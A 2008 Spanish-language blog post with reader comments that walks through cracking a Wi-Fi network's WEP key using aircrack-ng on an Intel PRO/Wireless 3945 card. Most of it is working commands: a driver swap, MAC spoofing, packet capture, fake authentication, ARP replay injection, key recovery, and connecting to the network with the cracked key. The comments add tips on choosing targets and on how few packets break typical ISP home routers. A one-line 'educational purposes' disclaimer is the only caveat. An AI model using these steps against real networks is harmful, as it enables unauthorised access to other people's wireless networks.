Computer Science is no more about computers than astronomy is about telescopes. Edsger W. Dijkstra
Una montaña se escala en etapas, las propiedades se adquieren en etapas, y a la sabiduría se llega en etapas Proverbio asiático

Aircrack con Intel PRO/Wireless 3945

2008-12-29 08:26:38-06                  Esta entrada ha sido vista 196 veces.

Software Libre

Esta es una guía para poder encontrar las contraseñas WEP con una tarjeta Intel PRO/Wireless 3945ABG (IPW 3945).  Es la misma que puse en mi página.

Como pequeño preámbulo a esta guía, quisiera agregar que al principio no sabía que con los drivers normales de la tarjeta no se podía hacer la inyección de paquetes y activar el modo monitor. Lo cual hace que cualquier intento de usar programas para obtener la contraseña WEP fuera inútil. Pero hasta encontrar esta guía (que sirve de base para esta), pude hacer que funcionara.

Nota importante: Esta guía es con fines puramente didácticos y de investigación, el uso para cualquier otro fin queda a consideración del lector.

Instalandor driver iwlwifi

Para empezar es necesario haber instalado el driver de la tarjeta IPW3945, el cuál en los nuevos paquetes ya no es necesario instalar el driver ipw3945. Ahora únicamente bastaría con lo siguiente:

  # aptitude install firmware-iwlwifi  

De esa forma ya tendremos funcionando la inalámbrica, pero como expliqué antes con este driver no se pueden realizar ninguna de las acciones necesarias para nuestro objetivo.

Descargando e instalando driver ipwraw

Para buscar el driver más actual puede visitar esta página. En este caso utilizaremos el 2.3.4-04022008.

  $ wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2

// Descargamos el driver

$ tar -xjf ipwraw-ng*

// Descomprimimos

$ cd ipwraw-ng

// Accedemos al directorio

$ make

// Compilamos

# make install

# make install_ucode

// Instalamos el driver(Notar que esto se debe realizar como superusuario)

# echo "blacklist ipwraw" | tee /etc/modprobe.d/ipwraw

// Agregamos el ipwraw a la lista negra para que no se cargue al bootear, ya que

// eso haría fallar las conexiones normales

# depmod -ae

// Se genera la lista de dependencias entre módulos  

Esta instalación no se tiene que hacer cada vez que se desee buscar contraseñas WEP.

Empezamos a trabajar...

Ya con esto lo que tenemos que hacer es primero desactivar el driver normal, y activar el ipwraw.

# modprobe -r iwl3945

# modprobe ipwraw  

Configuración para capturar paquetes

Cambiamos dirección MAC

Primero tendremos que cambiar la dirección MAC. (Este paso no es absolutamente necesario, pero podría ser útil)

# airmon-ng stop wifi0

// Detenemos el modo monitor de la tarjeta (que se activa con el nuevo driver)

# macchanger --mac 00:11:22:33:44:55 wifi0

// Cambiamos la dirección MAC

#airmon-ng start wifi0

// Reiniciamos el modo monitor  

Buscamos los puntos de acceso disponibles

Para empezar tenemos que escanear todas los puntos de acceso disponibles y tenemos que sacar la siguiente información: BSSID, ESSID y el Canal en el que está trabajando.

  # airodump-ng wifi0  

Capturamos paquetes

Una vez elegido el punto de acceso del que queremos obtener la contraseña, hacemos lo siguiente:

# airodump-ng -c [canal] -w [nombredelarchivo] --bssid [bssid] wifi0

// Todas las capturas se guardan en un archivo.  

Inyectamos paquetes

Desde otra consola podemos generar paquetes falsos para acelerar la captura.

  # aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] wifi0

// Autenticamos a nuestra tarjeta con el punto de acceso

# aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 wifi0

// Empezamos a generar los paquetes  

Desciframos la contraseña

Después de una gran cantidad de paquetes (según Vendaval, tendrían que ser entre 50,000 y 1000,000, en otra guía decía que bastaría con 20,000) podemos aplicar el aircrack para obtener la clave.

  # aircrack-ng -n 128 -b [bssid] [nombredelarchivo]-01.cap  

Al final de esto aparecerá un mensaje mostrándote la contraseña separada por :, VV:WW:XX:YY:ZZ. Al final la clave sería: VVWWXXYYZZ.

¡Con eso quiere decir que todo está listo!.

Para finalizar activamos el driver normal de la tarjeta nuevamente y probamos si los resultados que se obtuvieron fueron los correctos.

Corrección: Me equivoqué en esta última parte

# modprobe -r ipwraw 

# modprobe iwl3945

Agregado de Starkad: Por un comentario de starkad me animé a agregar como conectarse desde consola.

# ifconfig wlan0 up

# iwlist wlan0 scanning

  // Escogemos el punto de acceso

# iwconfig wlan0 essid <nombrepuntoacceso> key <laclaveencontrada>

# dhclient wlan0

   // En este caso funcionará solo si está configurada la red con dhcp en otro caso tendríamos que revisar que direcciones ip están manejando y demás.

Permalink: http://www.mononeurona.org/entries/view/thot/1701

Comments Commentblogs:
1.- asarch wrote:

¡Vaya!<br />
<br />
No creí que fuera tan difícil.<br />
<br />
Voy a buscar la manera de hacerlo con los BSDs.<br />
<br />
Suerte.

2008-12-29 09:00:05-06
2.- thot wrote:

Difícil?, realmente no es difícil, nada más hay que instalar el driver y cambiarlo cuando se necesite. El pedo es que la &quot;sanitización&quot; del editor de la mononeurona le parte la madre al formato.

2008-12-29 09:04:28-06
3.- asimov wrote:

Antes de airodump&#45;ng podemos verificar los AP&#39;s mas efectivos con aireplay&#45;ng &#45;9 &lt;interface&gt;<br />
<br />
Con 10 000 iv&#39;s es posible obtener un cifrado de 64&#45;bits &#40;el que por default se usa en una instalación estandar de prodigy y cablevision caseras&#41;.<br />
<br />
En el modo PTW se llega a requerir menos cantidad de iv&#39;s.<br />
<br />
Excelente post, saludos!!!

2008-12-29 12:03:55-06
4.- thot wrote:

Sí, se me olvidó agregar el modo test del aireplay. Pero bueno, es la ventaja de la retroalimentación de los comentarios.

2008-12-29 12:12:05-06
5.- asarch wrote:

Es facil evitar la satinizacion:<br />
<br />
Escribe la entrada usando el editor HTML del SeaMonkey, despues copia, pega y agrega la entrada.

2008-12-29 22:11:41-06
6.- asarch wrote:

entrada ... entrada &lt;&#45; D&#39;oh!

2008-12-29 22:12:44-06
7.- der_teufel wrote:

Excelente guía Thot!!<br />
<br />
Yo alguna vez quise escribir una para esta tarjeta, pero no lo hice :&#39;&#40;<br />
<br />
Quizá les interese también wesside&#45;ng, también parte de la suite aircrack&#45;ng<br />
<br />
http://www.aircrack&#45;ng.org/doku.php?id=wesside&#45;ng<br />
<br />
Saludos!

2008-12-30 00:59:11-06
8.- starkad wrote:

Funciona y funciona muy bien.<br />
En mi caso, para volver a tener normal el funcionamiento de la tarjeta y conectarme a la red de &quot;pruebas&quot;, le pongo lo siguiente.<br />
<br />
# modprobe ipwraw<br />
# modprobe &#45;r iwl3945<br />
# modprobe iwl3945<br />
# ifconfig wlan0_rename up<br />
# iwlist wlan0_rename scanning<br />
<br />
Excelente guía, felicidades.<br />
<br />
<br />


2008-12-30 21:52:05-06
9.- vendaval wrote:

Estoy seguro que capturando 1,000,000 de paquetes funciona =&#41;, con kismet he notado que hay varias longitudes de clave &#40;al menos 64 y 128 bits&#41;, supongo que variando la longitud el numero de paquetes a capturar aumenta o disminuye en la misma proporcion, felices fiestas thot.

2008-12-31 07:46:14-06
10.- thot wrote:

Según las FAQ de aircrack, dice que con este tipo de ataque 20000/40000 paquetes son suficientes. Cuando no hay inyección de peticiones ARP serían necesarios de 300,000 a 1,500,000.<br />
Más información &#40;http://www.aircrack&#45;ng.org/doku.php?id=faq&#41;<br />
<br />
Igualmente vendaval.<br />
<br />
&#40;Cierto se me olvidó agregar la forma de conectarse, gracias Starkad&#41;.

2008-12-31 08:30:02-06
New Commentblog
CAPTCHA Image




Join us!
Forgot your password?
This blog has been visited
15,258 times
thot
Amante de la libertad y por lo mismo un ferviente partidario del software libre.
Powered by
Despabilando la MonoNeurona.org
Livechat
<-Nombre

thot wrote:
o gedit.
on 15/1/10

thot wrote:
Kile, y vi o emacs.
on 15/1/10

netstak wrote:
@thot, usas algún editor para LaTeX?
on 15/1/10

holas wrote:
asasa
on 18/11/09

jairo wrote:
cual es el otro blog de thot
on 9/8/08

souf wrote:
está vivo... ¡VIVO!
on 10/6/08

souf wrote:
¡funciona!
on 10/6/08

souf wrote:
yes
on 10/6/08

thot wrote:
simón, s1mo yo creo que sí. Hay que ponerse de acuerdo.
on 6/5/08

s1m0 wrote:
que onda thot ps el aarkerio que tiene ganas de un curado de melon jaja ps ahora que vayamos a teotihuacan jaja como vez??
on 2/5/08


:P no así en producción.
2 weeks, 1 day ago
En un par de días uno de nuestros servicios se actualizará a la versión 3.2 de rails.
2 weeks, 1 day ago
@aarkerio: Yo lo uso. Porque nuestros proyectos están en rails 3.1
on 2/1/12
@aakerio, que te recuperes pronto. Un mezcal con limón podría ayudarte. (aunque posiblemente no te cure)
on 24/11/11
Felicidades Rnstux! Nos ponemos de acuerdo para la conexión
on 28/10/11
@mandrake, ya te envié un correo...
on 4/10/11
Empezando con el http://community. logicalbricks.com/
on 4/10/11
Me uno a la causa ecologista!, tampoco tengo auto.
on 22/9/11
@vendaval: Felicidades Vendaval!, que te la pases muy chingón.
on 13/9/11
@vendaval, digo, no por nada el que diseñó logo se supone que es uno de los mejores alumnos de Jean Piaget.
on 7/9/11
Mis Albums
FirefoxjEdit.orgGimpOpenOffice.orgHacker
Top
Colectivo MonoNeurona.org © 2002-2011.